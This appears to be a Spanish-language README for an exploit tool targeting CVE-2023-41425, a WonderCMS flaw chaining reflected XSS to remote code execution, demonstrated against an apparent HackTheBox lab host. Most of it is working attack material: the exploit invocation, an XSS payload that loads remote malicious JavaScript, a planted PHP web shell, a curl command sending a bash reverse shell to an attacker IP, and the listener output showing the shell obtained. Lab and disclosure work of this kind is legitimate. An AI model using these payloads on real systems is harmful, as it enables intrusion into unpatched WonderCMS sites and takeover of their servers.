
WonderCMS v3.2.0 - v3.4.2 exploit de XSS a RCE
CVE-2023-41425 es una vulnerabilidad XSS reflejado en Wonder CMS que permite ejecutar código arbitrario a través de un script malicioso mediante el componente installModule.
Ejecutando el exploit contra la loginURL del objetivo, especificando nuestra IP y puerto para el servidor web que aloja el archivo .js malicioso:
$ python3 exploit.py --url http://sea.htb/loginURL --xip 10.10.16.25 --xport 8888
[+] Creating PHP Web Shell
[+] Writing malicious.js
[+] XSS Payload:
http://sea.htb/index.php?page=loginURL?"></form><script+src="http://10.10.16.25:8888/malicious.js"></script><form+action="
[+] Web Shell can be accessed once .zip file has been requested:
http://sea.htb/themes/malicious/malicious.php?cmd=<COMMAND>
[+] To get a reverse shell connection run the following:
[+] curl -s 'http://sea.htb/themes/malicious/malicious.php' --get --data-urlencode "cmd=bash -c 'bash -i >& /dev/tcp/<LHOST>/<LPORT> 0>&1'"
[+] Starting HTTP server
Serving HTTP on 10.10.16.25 port 8888 (http://10.10.16.25:8888/) ...
<--REDACTED--> "GET /malicious.js HTTP/1.1" 200 -
<--REDACTED--> "GET /malicious.zip HTTP/1.1" 200 -
<--REDACTED--> "GET /malicious.zip HTTP/1.1" 200 -
<--REDACTED--> "GET /malicious.zip HTTP/1.1" 200 -
<--REDACTED--> "GET /malicious.zip HTTP/1.1" 200 -
Enviar el payload XSS a la víctima. Una vez que la víctima abre el enlace, el .js será solicitado por ella desde el servidor web iniciado arriba. El .js descargará entonces el módulo .zip malicioso que contiene una simple web shell PHP.
Una vez que se ha solicitado el .zip, debería haberse instalado a través de installModule y se puede acceder a él mediante el enlace proporcionado por el script.
$ curl -s 'http://sea.htb/themes/malicious/malicious.php?cmd=id'
uid=33(www-data) gid=33(www-data) groups=33(www-data)
Configure el listener primero, luego ejecute cualquier comando para establecer una conexión de shell inversa. El script proporciona un ejemplo para hacerlo (Linux).
$ curl -s 'http://sea.htb/themes/malicious/malicious.php' --get --data-urlencode "cmd=bash -c 'bash -i >& /dev/tcp/10.10.16.25/7777 0>&1'"
Y obtenga la conexión en el listener:
$ rlwrap -cAr nc -lvnp 7777
listening on [any] 7777 ...
connect to [10.10.16.25] from (UNKNOWN) [10.129.194.205] 54398
bash: cannot set terminal process group (1135): Inappropriate ioctl for device
bash: no job control in this shell
www-data@sea:/var/www/sea/themes/malicious$
Instale los requisitos:
pip install -r requirements.txt
Ayuda:
$ python3 exploit.py --help
usage: exploit.py [-h] --url URL --xip XIP --xport XPORT
Exploit Wonder CMS v3.2.0 - v3.4.2 XSS to RCE (CVE-2023-41425)
Initial CVE and proof-of-concept by prodigiousMind
Rewritten by xpltive
options:
-h, --help show this help message and exit
--url URL Target URL of loginURL (Example: http://sea.htb/loginURL)
--xip XIP IP for HTTP web server that hosts the malicious .js file
--xport XPORT Port for HTTP web server that hosts the malicious .js file
Créditos a prodigiousMind por descubrir y reportar la vulnerabilidad (Enlace).